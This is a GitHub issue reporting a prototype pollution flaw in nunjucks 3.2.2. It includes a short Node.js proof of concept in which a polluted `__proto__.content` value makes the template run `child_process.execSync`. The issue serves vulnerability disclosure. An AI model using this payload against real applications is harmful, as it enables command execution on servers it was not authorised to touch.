Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Security bug about prototype pollution #1331

Comments

@ChenKS12138
Copy link
Contributor

This is a security bug. The current version of nunjucks can be attacked by prototype pollution.
What I expected isthis is payload2 content is function(){ return global.process.mainModule.require('child_process').execSync('ls') }() , but the function returns this is payload2 content is main.js node_modules package.json yarn.lock.

Closes #1330 .

Environment

Mac os 10.15.7
Nodejs 12.18.1
nunjucks 3.2.2

The sample code is as follows.

const nunjucks = require("nunjucks");

nunjucks.configure({
  autoescape: true,
});

const template = nunjucks.compile(" content is {{ content }} ");

const payload = { };

payload.__proto__.content =
  " function(){ return global.process.mainModule.require('child_process').execSync('whoami') }() ";

console.log("this is payload2 ", template.render(payload));

image

striezel added a commit to striezel-stash/rustsec-audit-check that referenced this issue Mar 13, 2023
Fixes a prototype pollution in nunjucks. See
<mozilla/nunjucks#1331> for more
information.
striezel added a commit to striezel-stash/rustsec-audit-check that referenced this issue Mar 13, 2023
Fixes a prototype pollution in nunjucks. See
<mozilla/nunjucks#1331> for more
information.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment